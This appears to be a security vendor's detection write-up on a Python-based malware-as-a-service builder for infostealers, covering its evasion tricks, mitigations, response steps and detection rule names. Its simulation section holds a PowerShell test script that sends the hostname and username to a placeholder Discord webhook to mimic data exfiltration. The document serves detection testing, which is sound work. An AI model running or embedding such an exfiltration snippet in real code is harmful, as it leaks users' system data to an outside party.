The Stealer Factory: Python-Powered MaaS for Building Infostealers
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A new Malware-as-a-Service (MaaS) operation has been identified using a Python-based builder to generate customized infostealer payloads. The builder enables operators to package malware as Windows executables through Nuitka or PyInstaller while embedding webhook configurations. The resulting stealers target browser credentials, Discord tokens, Roblox cookies, and stored Wi-Fi passwords.
Investigation
Analysts examined a nested archive containing both the builder and an embedded payload. The investigation found that the builder protects webhook URLs using XOR and Base64 encoding and can automatically install required dependencies through pip.exe. The generated payload also implements anti-analysis techniques, including debugger detection and disk-size checks designed to identify sandboxed environments.
Mitigation
Organizations should monitor for unexpected execution of pip.exe and suspicious scheduled task creation. Restricting access to browser data directories and detecting unauthorized use of netsh commands can further reduce exposure. Keeping endpoint protection solutions current is also important for identifying rapidly evolving Python-based malware families.
Response
When malicious activity is detected, isolate the affected endpoint to stop further data exfiltration through attacker-controlled webhooks. Review registry Run keys and scheduled tasks for unauthorized persistence mechanisms. Analyze network telemetry for unusual HTTP POST requests directed to unknown, newly observed, or suspicious webhook endpoints.
Attack Flow
We are still updating this part.
Detections
Possible Schtasks or AT Usage for Persistence (via cmdline)
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via cmdline)
Possible IP Lookup Domain Communications Attempted (via dns)
IOCs (HashMd5) to detect: The Stealer Factory: Unpacking a Python-Based MaaS Infostealer Builder
Detection of Debugger Presence and Wi-Fi Profile Enumeration Attempts [Windows Process Creation]
Suspicious HTTP POST Requests to Webhook Endpoints [Windows Network Connection]
Detection of Unexpected Pip Execution and PyInstaller Invocation in Python Malware Builder [Windows Process Creation]
Simulation Execution
-
Attack Narrative & Commands: An adversary has deployed a lightweight infostealer on a Windows workstation. To avoid the overhead of managing a dedicated C2 server, the attacker uses a Discord Webhook to exfiltrate system metadata (e.g., hostname and username). The script performs an HTTP POST request to the Discord API. This action is designed to blend in with legitimate developer or gaming traffic while specifically targeting the
discordapp.com/api/webhooksURI pattern, which the detection rule is programmed to flag. -
Regression Test Script:
# Simulation of Data Exfiltration via Discord Webhook $webhookUrl = "https://discordapp.com/api/webhooks/test-id/test-token" $payload = @{ content = "Exfiltrated Data: Hostname=$env:COMPUTERNAME, User=$env:USERNAME" } | ConvertTo-Json Write-Host "[+] Simulating Webhook Exfiltration..." try { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Host "[+] Simulation command sent successfully." } catch { Write-Host "[-] Command sent (Expected failure if URL is fake, but telemetry should still generate): $_" } -
Cleanup Commands:
# No persistent files were created; no cleanup required for this memory-only simulation. Write-Host "[+] Cleanup complete: No artifacts left on system."